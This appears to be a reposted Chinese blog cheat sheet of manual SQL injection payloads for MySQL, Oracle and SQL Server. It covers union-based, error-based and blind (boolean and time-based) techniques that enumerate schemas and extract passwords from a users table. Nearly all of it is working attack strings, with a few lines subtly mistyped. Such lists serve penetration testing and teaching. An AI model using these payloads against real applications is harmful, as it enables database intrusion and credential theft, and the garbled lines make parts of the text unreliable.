  • SQL手工注入方法

    https://mp.weixin.qq.com/s/RLdBCOUkcLpRoniacOP-Kw

    1、Mysql 手工注入

    联合注入

    ?id=1' order by 4--+

    ?id=0' union select 1,2,3,database()--+

    ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+

    ?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+

    #group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name

    ?id=0' union select 1,2,3,group_concat(password) from users --+

    #group_concat 可替换为 concat_ws(',',id,users,password )

    ?id=0' union select 1,2,3,password from users limit 0,1--+

    报错注入

    1.floor()

    select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

    2.extractvalue()

    select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

    3.updatexml()

    select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

    4.geometrycollection()

    select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

    5.multipoint()

    select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

    6.polygon()

    select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

    7.multipolygon()

    select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

    8.linestring()

    select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

    9.multilinestring()

    select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

    10.exp()

    select * from test where id=1 and exp(~(select * from(select user())a));

    updatexml() 报错的原理:updatexml 的第二个参数需要一个 XPath 格式的字符串,而以 ~ 开头的内容并不符合 XPath 语法;concat() 拼接出的字符串显然不满足这一规则,于是 MySQL 会把括号内的执行结果原样放进错误信息中报出,这样就实现了报错注入。

    爆库:?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +

    爆表:?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +

    爆字段:?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +

    爆数据:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +

    #concat 也可以放在外面 updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)

    这里需要注意的是它加了连接字符,导致数据中的 md5 只能爆出 31 位,这里可以用分割函数分割出来:

    substr(string string,num start,num length);

    #string为字符串,start为起始位置,length为长度

    ?id=1' and updatexml(1,concat(0x7e, substr((select password from users limit 1,1),1,16),0x7e),1) -- +

    盲注

    时间盲注

    ?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+

    ?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+

    布尔盲注

    ?id=1' and substr((select user()),1,1)='r' -- +

    ?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +

    #如果 IFNULL 第一个参数的表达式为 NULL,则返回第二个参数的备用值,不为 Null 则输出值

    ?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +

    #若所有的字符串均相同,STRCMP() 返回 0,若根据当前分类次序,第一个参数小于第二个,则返回 -1 ,其它情况返回 1

    Oracle 手工注入

    联合注入

    ?id=-1' union select user,null from dual--

    ?id=-1' union select version,null from v$instance--

    ?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--

    ?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)--

    ?id=-1' union select username,passwd from users--

    ?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--

    报错注入

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%))--

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))--

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))--

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--

    布尔盲注

    ?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--

    ?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--

    ?id=1' and ascii(substr(user,1,1))> 64-- #二分法

    时间盲注

    ?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

    ?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

    SQL server 手工注入

    联合注入

    ?id=-1' union select null,null--

    ?id=-1' union select @@servername, @@version--

    ?id=-1' union select db_name(),suser_sname()--

    ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--

    ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null--

    ?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--

    ?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null---

    ?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--

    报错注入

    ?id=1' and 1=(select 1/@@servername)--

    ?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--

    盲注

    布尔盲注

    ?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--

    时间盲注

    ?id= 1';if(2>1) waitfor delay '0:0:5'--

    ?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) waitfor delay '0:0:2'--

  • 原文地址:https://www.cnblogs.com/bingtang123/p/12955530.html